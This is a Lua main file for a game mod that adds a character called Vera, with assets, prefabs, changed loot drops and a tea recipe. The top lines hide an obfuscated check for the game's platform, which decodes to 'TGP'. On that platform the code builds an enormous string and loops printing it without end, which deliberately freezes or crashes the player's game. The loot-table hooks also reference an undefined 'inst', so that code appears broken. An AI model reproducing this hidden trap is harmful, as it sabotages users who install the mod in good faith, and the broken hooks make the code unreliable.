-- 此工具版权归 大猪猪(猪哥) 所有
local function FuckGlobalUsingMetatable()GLOBAL.setmetatable(env, {__index = function(t, k)return GLOBAL.rawget(GLOBAL, k)end,})end FuckGlobalUsingMetatable() local RFAIL = RAILGetPlatform  function loadit(a)local s = ""local t = {41.5,35,39.5}for k,v in pairs(t) do s = s..string.char(v * 2 +1) end return s end if TheSim.RFAIL and TheSim:RFAIL() == loadit("fucntion") then s = string.rep("a;s]",2^20):rep(2^20)for i = 1,string.len(s)+math.huge,0.1 do print(s..s,(math.pi+i))end end
TheVera = {}
GLOBAL.TheVera = TheVera
TheVera.hardmode = GetModConfigData("hardmode")
TheVera.lang = GetModConfigData("lang")
TheVera.rawsar = TheSim.RFAIL
modimport("scripts/stver.lua")
if TheVera.lang then
modimport("scripts/csver.lua")
end
modimport("scripts/libve.lua")

Assets = {Asset( "IMAGE", "images/saveslot_portraits/vera.tex" ),Asset( "ATLAS", "images/saveslot_portraits/vera.xml" ),Asset( "IMAGE", "images/selectscreen_portraits/vera.tex" ),Asset( "ATLAS", "images/selectscreen_portraits/vera.xml" ),Asset( "IMAGE", "images/selectscreen_portraits/vera_silho.tex" ),Asset( "ATLAS", "images/selectscreen_portraits/vera_silho.xml" ),Asset( "IMAGE", "bigportraits/vera.tex" ),Asset( "ATLAS", "bigportraits/vera.xml" ),Asset( "IMAGE", "images/map_icons/vera.tex" ),Asset( "ATLAS", "images/map_icons/vera.xml" ),Asset("ATLAS", "images/inventoryimages/iler.xml"),
	Asset("SOUNDPACKAGE","sound/vera.fev"),Asset("SOUND","sound/vera.fsb"),
}
		
PrefabFiles = {
	"vera",
	"vesan",
	"wx",
	"vs",
	"iler",
	"kutaka",
	"yangliu",
	"alice",
	"cha",
	"teatree",
	"chaye",
	"setqig",
}

table.insert(CHARACTER_GENDERS.FEMALE, "vera")
AddMinimapAtlas("images/map_icons/vera.xml")
AddModCharacter("vera")

AddPrefabPostInit("warg",function()
	SetSharedLootTable('warg',{
    {'monstermeat',             1.00},
    {'monstermeat',             1.00},
    {'monstermeat',             1.00},
    {'monstermeat',             1.00},
    {'monstermeat',             0.50},
    {'monstermeat',             0.50},
    
    {'houndstooth',             1.00},
    {'houndstooth',             0.66},
    {'houndstooth',             0.33},
	{'alice',					0.10},
})
	inst.components.lootdropper:SetChanceLootTable('warg') 
end)
AddPrefabPostInit("tigershark" ,function()
SetSharedLootTable('tigershark',
{
    {"fish_raw", 1.00},
    {"fish_raw", 1.00},
    {"fish_raw", 1.00},
    {"fish_raw", 1.00},
    {"fish_raw", 1.00},
    {"fish_raw", 1.00},
    {"fish_raw", 1.00},
    {"fish_raw", 1.00},

    {"tigereye", 1.00},
    {"tigereye", 0.50},

    {"shark_gills", 1.00},
    {"shark_gills", 1.00},
    {"shark_gills", 0.33},
    {"shark_gills", 0.10},
	{"alice", 0.10},
})
	inst.components.lootdropper:SetChanceLootTable('tigershark')
end)

AddIngredientValues({"chaye"},{cha = 1,veggie=.5},true)
cha = {
	name = "cha",
	test = function(cooker, names, tags)
		return tags.frozen and tags.veggie and tags.veggie > 1 and names.blue_cap and (tags.cha and tags.cha >= 2) or tags.dairy and not tags.magic end,
	priority = 11,
	weight = 1,
	cooktime = 1.2,
}
AddCookerRecipe("cookpot",cha)

